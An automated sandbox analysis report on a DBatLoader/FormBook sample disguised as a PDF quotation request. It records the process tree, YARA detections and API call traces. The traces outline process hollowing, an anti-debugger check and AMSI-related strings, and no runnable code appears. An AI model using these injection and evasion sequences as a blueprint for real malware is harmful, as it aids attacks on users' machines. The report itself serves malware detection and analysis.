                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="233_Csswqtmksmz"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 820608
                                                                Last-Modified: Mon, 23 Dec 2024 10:57:05 GMT
                                                                Date: Tue, 24 Dec 2024 10:28:48 GMT
                                                                Expires: Tue, 24 Dec 2024 10:28:48 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=I/VCqQ==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Target ID:1
                                                                Start time:05:28:38
                                                                Start date:24/12/2024
                                                                Path:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe"
                                                                Imagebase:0x400000
                                                                File size:1'525'248 bytes
                                                                MD5 hash:AACA1B72E0AC5DC118B0F981667E8179
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.1454887836.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.1415147873.0000000002466000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:05:28:49
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:05:28:49
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:05:28:50
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 3%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:05:29:02
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\Csswqtmk.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Csswqtmk.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'525'248 bytes
                                                                MD5 hash:AACA1B72E0AC5DC118B0F981667E8179
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 66%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:05:29:04
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:05:29:04
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:05:29:04
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000001.1542389748.0000000001360000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.1977379900.0000000001360000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:05:29:11
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\Csswqtmk.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Csswqtmk.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'525'248 bytes
                                                                MD5 hash:AACA1B72E0AC5DC118B0F981667E8179
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:05:29:12
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:05:29:12
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:05:29:12
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000002.2043784716.0000000001360000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000001.1672552256.0000000001360000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:15.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:10%
                                                                  Total number of Nodes:300
                                                                  Total number of Limit Nodes:21

                                                                  Control-flow Graph

call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 2967ed4 call 29687a0 * 2 7349->7575 7350->7349 7575->6830
                                                                  APIs
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                    • Part of subcall function 029685DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02968668
                                                                  • GetThreadContext.KERNEL32(00000868,029B1420,ScanString,029B13A4,0296A77C,UacInitialize,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,UacInitialize,029B13A4), ref: 02969442
                                                                    • Part of subcall function 02968254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029682C5
                                                                    • Part of subcall function 029684C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02968529
                                                                    • Part of subcall function 029679B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  • SetThreadContext.KERNEL32(00000868,029B1420,ScanBuffer,029B13A4,0296A77C,ScanString,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,00000878,002A9FF8,029B14F8,00000004,029B14FC), ref: 0296A157
                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000868,00000000,00000868,029B1420,ScanBuffer,029B13A4,0296A77C,ScanString,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,00000878,002A9FF8,029B14F8), ref: 0296A164
                                                                    • Part of subcall function 029687A0: LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                    • Part of subcall function 029687A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                    • Part of subcall function 029687A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                    • Part of subcall function 029685DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02968668
                                                                  • GetThreadContext.KERNEL32(00000868,029B1420,ScanString,029B13A4,0296A77C,UacInitialize,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,UacInitialize,029B13A4), ref: 02969442
                                                                    • Part of subcall function 02968254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029682C5
                                                                    • Part of subcall function 029684C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02968529
                                                                    • Part of subcall function 029679B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                  Similarity
                                                                  • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 8510 2955a78-2955ab9 GetModuleFileNameA RegOpenKeyExA 8511 2955afb-2955b3e call 29558b4 RegQueryValueExA 8510->8511 8512 2955abb-2955ad7 RegOpenKeyExA 8510->8512 8517 2955b40-2955b5c RegQueryValueExA 8511->8517 8518 2955b62-2955b7c RegCloseKey 8511->8518 8512->8511 8514 2955ad9-2955af5 RegOpenKeyExA 8512->8514 8514->8511 8516 2955b84-2955bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8514->8516 8519 2955c9e-2955ca5 8516->8519 8520 2955bbb-2955bbf 8516->8520 8517->8518 8521 2955b5e 8517->8521 8523 2955bc1-2955bc5 8520->8523 8524 2955bcb-2955be1 lstrlenA 8520->8524 8521->8518 8523->8519 8523->8524 8525 2955be4-2955be7 8524->8525 8526 2955bf3-2955bfb 8525->8526 8527 2955be9-2955bf1 8525->8527 8526->8519 8529 2955c01-2955c06 8526->8529 8527->8526 8528 2955be3 8527->8528 8528->8525 8530 2955c30-2955c32 8529->8530 8531 2955c08-2955c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8519 8532 2955c34-2955c38 8530->8532 8531->8530 8532->8519 8533 2955c3a-2955c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8519 8534 2955c6c-2955c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8519
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02950000,0297D790), ref: 02955A94
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AB2
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AD0
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02955AEE
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02955B37
                                                                  • RegQueryValueExA.ADVAPI32(?,02955CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001), ref: 02955B55
                                                                  • RegCloseKey.ADVAPI32(?,02955B84,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02955B77
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02955B94
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02955BA1
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02955BA7
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02955BD2
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C19
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C29
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C51
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C61
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02955C87
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02955C97
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10523 29687a0-29687c5 LoadLibraryW 10524 29687c7-29687df GetProcAddress 10523->10524 10525 296880f-2968815 10523->10525 10526 2968804-296880a FreeLibrary 10524->10526 10527 29687e1-2968800 call 2967d00 10524->10527 10526->10525 10527->10526 10530 2968802 10527->10530 10530->10526
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                  • API String ID: 1002360270-4067648912

                                                                  Control-flow Graph

                                                                  control_flow_graph 10540 296ebf0-296ec0a GetModuleHandleW 10541 296ec36-296ec3e 10540->10541 10542 296ec0c-296ec1e GetProcAddress 10540->10542 10542->10541 10543 296ec20-296ec30 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 296ec32 10543->10544 10544->10541
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 0296EC00
                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0296EC12
                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0296EC29
                                                                  Similarity
                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                  • API String ID: 35162468-539270669

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02954ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02954EDA
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DBEB
                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DC1B
                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0296DC30
                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0296DC5C
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0296DC65
                                                                    • Part of subcall function 02954C0C: SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  Similarity
                                                                  • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                  • String ID:
                                                                  • API String ID: 2659941336-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0296E436
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02954ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02954EDA
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DB9E), ref: 0296DB0B
                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0296DB45
                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0296DB72
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0296DB7B
                                                                  Similarity
                                                                  • API ID: File$AllocCloseCreateStringWrite
                                                                  • String ID:
                                                                  • API String ID: 3308905243-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02968668
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                  • API String ID: 3130163322-2353454454
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
